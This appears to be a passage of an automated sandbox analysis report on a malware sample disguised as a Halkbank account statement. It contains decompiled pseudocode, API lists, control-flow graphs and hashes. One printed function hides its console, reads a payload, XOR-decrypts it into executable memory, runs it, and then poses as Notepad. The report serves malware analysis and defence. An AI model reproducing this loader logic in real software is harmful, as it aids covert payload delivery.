					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                          0x004060cd
                                          0x004060cf
                                          0x004060d2
                                          0x004060fe
                                          0x004060d7
                                          0x004060e0
                                          0x004060e5
                                          0x004060f0
                                          0x004060f3
                                          0x0040610f
                                          0x004060f5
                                          0x004060fc
                                          0x00000000
                                          0x004060fc
                                          0x00406108
                                          0x0040610c
                                          0x0040610c
                                          0x00406106
                                          0x00000000

                                          APIs
                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                          • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                          • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                          • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                          • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                          • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Function 009F08B7 Relevance: 6.4, APIs: 4, Instructions: 366COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 382 9f08b7-9f09a4 call 9f005f call 9f0838 call 9f0073 * 8 404 9f09ab-9f09bb 382->404 405 9f09a6 382->405 408 9f09bd 404->408 409 9f09c2-9f09e5 CreateFileW 404->409 406 9f0d5f-9f0d62 405->406 408->406 410 9f09ec-9f0a12 VirtualAlloc ReadFile 409->410 411 9f09e7 409->411 412 9f0a19-9f0a2c 410->412 413 9f0a14 410->413 411->406 415 9f0d49-9f0d58 call 9f020a 412->415 416 9f0a32-9f0d44 412->416 413->406 419 9f0d5a-9f0d5c ExitProcess 415->419
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255511525.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_9f0000_dlcmto.jbxd
                                          Similarity
                                          • API ID: AllocNumaVirtual
                                          • String ID:
                                          • API String ID: 4233825816-0
                                          • Opcode ID: 9b02e0c8f91c06d1d802a9768ca63058f77e52de9b76f77817d8f7c8bc3545ba
                                          • Instruction ID: 71079fcc65a26b063b9ea231283b29f6e00c117b33fb6c3b0bc646c1238894f7
                                          • Opcode Fuzzy Hash: 9b02e0c8f91c06d1d802a9768ca63058f77e52de9b76f77817d8f7c8bc3545ba
                                          • Instruction Fuzzy Hash: 4AF18560D4D2DCADDB02CBE984157FCBFB45F26202F0841D6E5E4B6283C53A934ADB25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009F07DA Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemInfo.KERNELBASE(?), ref: 009F07F7
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255511525.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_9f0000_dlcmto.jbxd
                                          Similarity
                                          • API ID: InfoSystem
                                          • String ID:
                                          • API String ID: 31276548-0
                                          • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                          • Instruction ID: 38070479043699ef005dc82960784522c74da23d3747c76d42ff8d227f8710c5
                                          • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                          • Instruction Fuzzy Hash: 8EF0E572E1410CAFDF08EAF88845BBEB7ECDB88340F10467DEB16E2242E935854083E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01191B25 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01191B25() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E01191C4C); // executed
				return _t1;
			}




                                          0x01191b2a
                                          0x01191b30

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00001C4C,011915D3), ref: 01191B2A
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: c10480569f67232277667bf19305ea246e016a50e3bc3384d1726b6d747185bf
                                          • Instruction ID: 4c6bba36a30f18fed40436abdb494b4fe04a5bbb2b7e99d56ab8e65174d77284
                                          • Opcode Fuzzy Hash: c10480569f67232277667bf19305ea246e016a50e3bc3384d1726b6d747185bf
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011912E6 Relevance: 50.9, APIs: 26, Strings: 3, Instructions: 173windowregistrymemoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 84%
                                          			E011912E6(struct HWND__* __eax, void* __edx, void* __eflags, intOrPtr _a8) {
				char _v64;
				char _v104;
				intOrPtr _v132;
				char _v140;
				struct HACCEL__* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t30;
				long _t32;
				void* _t34;
				void* _t39;
				struct HINSTANCE__* _t40;
				int _t42;
				struct HMONITOR__* _t46;
				void* _t66;
				void* _t67;
				MSG* _t69;
				struct tagMONITORINFO* _t70;
				void* _t72;
				long _t77;
				WNDCLASSEXW* _t78;
				signed int _t80;
				void* _t86;
				void* _t91;
				void* _t92;
				void* _t93;

				_t93 = __eflags;
				_t72 = __edx;
				__imp__GetConsoleWindow(); // executed
				_t80 = 0;
				ShowWindow(__eax, 0); // executed
				_t30 = E01193CFA( *((intOrPtr*)(_a8 + 4)), 0x11a2a58); // executed
				E011940E9(_t72, _t30, 0, 2); // executed
				_t32 = E011943C0(_t66, _t72, _a8, 0, _t93, _t30); // executed
				_t77 = _t32;
				E011940E9(_t72, _t30, 0, 0); // executed
				_t34 = VirtualAlloc(0, _t77, 0x3000, 0x40); // executed
				_t67 = _t34;
				E01193EE6(_t34, _t77, 1, _t30); // executed
				_t91 = _t86 + 0x34;
				if(_t77 == 0) {
					L3:
					 *_t67(); // executed
					__imp__#17();
					RegisterWindowMessageW(L"commdlg_FindReplace");
					E011928D0(_t77, 0x11a7ab0, 0, 0x11f4);
					_t92 = _t91 + 0xc;
					_t39 = 0;
					do {
						 *((char*)(_t92 + _t39 + 0x20)) = 0;
						_t39 = _t39 + 1;
					} while (_t39 != 0x30);
					_t78 =  &_v104;
					_t78->cbSize = 0x30;
					 *((intOrPtr*)(_t78 + 8)) = E01191516;
					_t40 =  *0x11a7ab0; // 0x0
					_t78->hInstance = _t40;
					_t78->hIcon = LoadIconW(_t40, 0x300);
					_t42 = GetSystemMetrics(0x32);
					_t78->hIconSm = LoadImageW( *0x11a7ab0, 0x300, 1, GetSystemMetrics(0x31), _t42, 0x8000);
					_t78->hCursor = LoadCursorW(0, 0x7f00);
					_t78->hbrBackground = 6;
					_t78->lpszMenuName = 0x201;
					_t78->lpszClassName = L"Notepad";
					_t46 = RegisterClassExW(_t78);
					if(_t46 == 0) {
						__eflags = 0;
						return 0;
					}
					__imp__MonitorFromRect(0x11a8ca4, 1);
					_t70 =  &_v64;
					_t70->cbSize = 0x28;
					GetMonitorInfoW(_t46, _t70);
					_t99 =  *0x11a7ab4;
					if( *0x11a7ab4 == 0) {
						ExitProcess(1);
					}
					E0119109A(_t99);
					ShowWindow( *0x11a7ab4, 0);
					UpdateWindow( *0x11a7ab4);
					DragAcceptFiles( *0x11a7ab4, 1);
					GetCommandLineW();
					_v144 = LoadAcceleratorsW(0, 0x203);
					_t69 =  &_v140;
					if(GetMessageW(_t69, 0, 0, 0) == 0) {
						L13:
						return _v132;
					}
					do {
						if(IsDialogMessageW( *0x11a7ab8, _t69) == 0 && TranslateAcceleratorW( *0x11a7ab4, _v144, _t69) == 0) {
							TranslateMessage(_t69);
							DispatchMessageW(_t69);
						}
					} while (GetMessageW(_t69, 0, 0, 0) != 0);
					goto L13;
				}
				do {
					_t10 = "248058040134" +  ~((_t80 * 0xaaaaaaab >> 0x00000020 >> 0x00000001 & 0xfffffffc) + (_t80 * 0xaaaaaaab >> 0x00000020 >> 0x00000001 & 0xfffffffc) * 2); // 0x30383432
					 *(_t67 + _t80) =  *(_t67 + _t80) ^  *(_t80 + _t10);
					_t80 = _t80 + 1;
				} while (_t77 != _t80);
				goto L3;
			}






























                                          0x011912e6
                                          0x011912e6
                                          0x011912f4
                                          0x011912fa
                                          0x011912fe
                                          0x0119130c
                                          0x0119131a
                                          0x01191323
                                          0x0119132b
                                          0x01191330
                                          0x01191341
                                          0x01191347
                                          0x0119134e
                                          0x01191353
                                          0x01191358
                                          0x0119137c
                                          0x0119137c
                                          0x0119137e
                                          0x01191389
                                          0x0119139b
                                          0x011913a0
                                          0x011913a3
                                          0x011913a5
                                          0x011913a5
                                          0x011913aa
                                          0x011913ab
                                          0x011913b0
                                          0x011913b4
                                          0x011913ba
                                          0x011913c1
                                          0x011913c6
                                          0x011913d6
                                          0x011913e1
                                          0x011913ff
                                          0x0119140f
                                          0x01191412
                                          0x01191419
                                          0x01191420
                                          0x01191428
                                          0x01191431
                                          0x01191504
                                          0x00000000
                                          0x01191504
                                          0x0119143e
                                          0x01191444
                                          0x01191448
                                          0x01191450
                                          0x01191456
                                          0x0119145d
                                          0x01191510
                                          0x01191510
                                          0x01191463
                                          0x01191471
                                          0x0119147d
                                          0x0119148b
                                          0x01191491
                                          0x011914a3
                                          0x011914a6
                                          0x011914b6
                                          0x011914fe
                                          0x00000000
                                          0x011914fe
                                          0x011914c4
                                          0x011914cf
                                          0x011914e7
                                          0x011914ee
                                          0x011914ee
                                          0x011914fa
                                          0x00000000
                                          0x011914c4
                                          0x0119135f
                                          0x0119136d
                                          0x01191374
                                          0x01191377
                                          0x01191378
                                          0x00000000

                                          APIs
                                          • GetConsoleWindow.KERNELBASE ref: 011912F4
                                          • ShowWindow.USER32(00000000,00000000), ref: 011912FE
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 01191341
                                          • __fread_nolock.LIBCMT ref: 0119134E
                                          • #17.COMCTL32 ref: 0119137C
                                          • RegisterWindowMessageW.USER32(commdlg_FindReplace), ref: 01191389
                                          • LoadIconW.USER32(00000000,00000300), ref: 011913D0
                                          • GetSystemMetrics.USER32 ref: 011913E1
                                          • GetSystemMetrics.USER32 ref: 011913E7
                                          • LoadImageW.USER32 ref: 011913F9
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 01191409
                                          • RegisterClassExW.USER32 ref: 01191428
                                          • MonitorFromRect.USER32(011A8CA4,00000001), ref: 0119143E
                                          • GetMonitorInfoW.USER32 ref: 01191450
                                          • ShowWindow.USER32(00000000), ref: 01191471
                                          • UpdateWindow.USER32 ref: 0119147D
                                          • DragAcceptFiles.SHELL32(00000001), ref: 0119148B
                                          • GetCommandLineW.KERNEL32 ref: 01191491
                                          • LoadAcceleratorsW.USER32 ref: 0119149D
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 011914AE
                                          • IsDialogMessageW.USER32(?), ref: 011914CB
                                          • TranslateAcceleratorW.USER32(?,?), ref: 011914DC
                                          • TranslateMessage.USER32(?), ref: 011914E7
                                          • DispatchMessageW.USER32 ref: 011914EE
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 011914F8
                                          • ExitProcess.KERNEL32 ref: 01191510
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: Message$Window$Load$MetricsMonitorRegisterShowSystemTranslate$AcceleratorAcceleratorsAcceptAllocClassCommandConsoleCursorDialogDispatchDragExitFilesFromIconImageInfoLineProcessRectUpdateVirtual__fread_nolock
                                          • String ID: Notepad$PTJu$commdlg_FindReplace
                                          • API String ID: 3399944458-3233714969
                                          • Opcode ID: 4109246b0c96632918cd0ea68cea2489fc1a33b18b73e2f991d64b77158425c6
                                          • Instruction ID: 3178a8f6eb6eb8e6f35acb978b2f84843f51c676a349b2135aaa904a8deb3e7f
                                          • Opcode Fuzzy Hash: 4109246b0c96632918cd0ea68cea2489fc1a33b18b73e2f991d64b77158425c6
                                          • Instruction Fuzzy Hash: 9651F171104202BFE7795BB1DC0DF6B3FAEFB84719F840425F52596186D7719980CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01199629 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 33 1199629-1199639 34 119963b-119964e call 1196e52 call 1196e3f 33->34 35 1199653-1199655 33->35 51 11999d2 34->51 37 119965b-1199661 35->37 38 11999ba-11999c7 call 1196e52 call 1196e3f 35->38 37->38 41 1199667-119968d 37->41 56 11999cd call 11964d1 38->56 41->38 44 1199693-119969c 41->44 47 119969e-11996b1 call 1196e52 call 1196e3f 44->47 48 11996b6-11996b8 44->48 47->56 49 11996be-11996c1 48->49 50 11999b6-11999b8 48->50 49->50 54 11996c7-11996cb 49->54 55 11999d5-11999d8 50->55 51->55 54->47 58 11996cd-11996e4 54->58 56->51 61 1199735-119973b 58->61 62 11996e6-11996e9 58->62 66 119973d-1199747 61->66 67 1199701-1199718 call 1196e52 call 1196e3f call 11964d1 61->67 64 11996f9-11996ff 62->64 65 11996eb-11996f4 62->65 64->67 71 119971d-1199730 64->71 70 11997b9-11997c9 65->70 68 1199749-119974b 66->68 69 119974e-119976c call 1197200 call 11963fe * 2 66->69 99 11998ed 67->99 68->69 104 1199789-11997b2 call 119a08d 69->104 105 119976e-1199784 call 1196e3f call 1196e52 69->105 73 11997cf-11997db 70->73 74 119988e-1199897 call 119b552 70->74 71->70 73->74 77 11997e1-11997e3 73->77 88 1199899-11998ab 74->88 89 119990a 74->89 77->74 81 11997e9-119980d 77->81 81->74 85 119980f-1199825 81->85 85->74 90 1199827-1199829 85->90 88->89 94 11998ad-11998bc GetConsoleMode 88->94 92 119990e-1199926 ReadFile 89->92 90->74 95 119982b-1199851 90->95 97 1199928-119992e 92->97 98 1199982-119998d GetLastError 92->98 94->89 100 11998be-11998c2 94->100 95->74 103 1199853-1199869 95->103 97->98 108 1199930 97->108 106 119998f-11999a1 call 1196e3f call 1196e52 98->106 107 11999a6-11999a9 98->107 102 11998f0-11998fa call 11963fe 99->102 100->92 101 11998c4-11998de ReadConsoleW 100->101 109 11998ff-1199908 101->109 110 11998e0 GetLastError 101->110 102->55 103->74 114 119986b-119986d 103->114 104->70 105->99 106->99 111 11999af-11999b1 107->111 112 11998e6-11998ec call 1196e65 107->112 118 1199933-1199945 108->118 109->118 110->112 111->102 112->99 114->74 121 119986f-1199889 114->121 118->102 125 1199947-119994b 118->125 121->74 126 119994d-119995d call 1199a54 125->126 127 1199964-119996f 125->127 139 1199960-1199962 126->139 133 119997b-1199980 call 1199d0c 127->133 134 1199971 call 11999d9 127->134 140 1199976-1199979 133->140 134->140 139->102 140->139
                                          C-Code - Quality: 82%
                                          			E01199629(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E01196E52(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E01196E3F( *_t137))) = 9;
						L60:
						_t139 = E011964D1();
						goto L61;
					}
					__eflags = _t198 -  *0x11a9658; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x11a9458 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E01196E52(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E01196E3F(__eflags))) = 0x16;
								E011964D1();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E01197200(_t154);
								E011963FE(0);
								E011963FE(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E0119A08D(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x11a9458 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x11a9458 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t57 = _t143 + 0x2a; // 0x10c483c2
										_t180 =  *((intOrPtr*)(_v20 + _t57));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x11a9458 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t74 =  *((intOrPtr*)(0x11a9458 + _v12 * 4)) + 0x2b; // 0x8310c483
													_t185 =  *((intOrPtr*)(_v20 + _t74));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x11a9458 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t91 =  *((intOrPtr*)(0x11a9458 + _v12 * 4)) + 0x2c; // 0xf88310c4
																_t190 =  *((intOrPtr*)(_v20 + _t91));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x11a9458 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E0119B552(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0); // executed
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E01196E65(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E01196E3F(__eflags))) = 9;
											 *(E01196E52(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x11a9458 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E01199D0C();
												} else {
													_t170 = E011999D9();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E01199A54(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x11a9458 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E01196E3F(__eflags))) = 0xc;
									 *(E01196E52(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E011963FE(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x11a9458 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E01196E52(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E01196E3F(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E01196E52(_t246)) =  *_t197 & 0x00000000;
					_t139 = E01196E3F(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}





















































                                          0x01199632
                                          0x01199636
                                          0x01199639
                                          0x01199653
                                          0x01199655
                                          0x011999ba
                                          0x011999ba
                                          0x011999bf
                                          0x011999bf
                                          0x011999c7
                                          0x011999cd
                                          0x011999cd
                                          0x00000000
                                          0x011999cd
                                          0x0119965b
                                          0x01199661
                                          0x00000000
                                          0x00000000
                                          0x0119966b
                                          0x01199671
                                          0x01199674
                                          0x01199677
                                          0x01199681
                                          0x01199684
                                          0x01199687
                                          0x0119968b
                                          0x0119968d
                                          0x00000000
                                          0x00000000
                                          0x01199693
                                          0x01199696
                                          0x0119969c
                                          0x011996b6
                                          0x011996b8
                                          0x011999b6
                                          0x00000000
                                          0x011999b6
                                          0x011996be
                                          0x011996c1
                                          0x00000000
                                          0x00000000
                                          0x011996c7
                                          0x011996cb
                                          0x00000000
                                          0x00000000
                                          0x011996d1
                                          0x011996d4
                                          0x011996d8
                                          0x011996df
                                          0x011996e1
                                          0x011996e1
                                          0x011996e4
                                          0x01199739
                                          0x0119973b
                                          0x01199701
                                          0x01199706
                                          0x0119970d
                                          0x01199713
                                          0x00000000
                                          0x0119973d
                                          0x0119973f
                                          0x01199740
                                          0x01199742
                                          0x01199745
                                          0x01199747
                                          0x01199749
                                          0x0119974b
                                          0x0119974b
                                          0x01199756
                                          0x01199758
                                          0x0119975f
                                          0x01199764
                                          0x01199767
                                          0x0119976a
                                          0x0119976c
                                          0x01199790
                                          0x01199798
                                          0x0119979b
                                          0x011997a2
                                          0x011997a9
                                          0x011997ad
                                          0x011997af
                                          0x011997b2
                                          0x011997b9
                                          0x011997b9
                                          0x011997bc
                                          0x011997be
                                          0x011997c1
                                          0x011997c6
                                          0x011997c9
                                          0x011997d2
                                          0x011997d2
                                          0x011997d6
                                          0x011997d9
                                          0x011997db
                                          0x011997e1
                                          0x011997e3
                                          0x011997ec
                                          0x011997ed
                                          0x011997ef
                                          0x011997f3
                                          0x011997f4
                                          0x011997f8
                                          0x011997fb
                                          0x01199805
                                          0x0119980a
                                          0x0119980d
                                          0x0119981c
                                          0x0119981c
                                          0x01199820
                                          0x01199823
                                          0x01199825
                                          0x01199827
                                          0x01199829
                                          0x0119982e
                                          0x01199830
                                          0x01199834
                                          0x01199835
                                          0x0119983b
                                          0x01199845
                                          0x01199846
                                          0x01199849
                                          0x0119984e
                                          0x01199851
                                          0x01199860
                                          0x01199860
                                          0x01199864
                                          0x01199867
                                          0x01199869
                                          0x0119986b
                                          0x0119986d
                                          0x0119986f
                                          0x01199875
                                          0x01199875
                                          0x01199876
                                          0x01199885
                                          0x01199888
                                          0x01199889
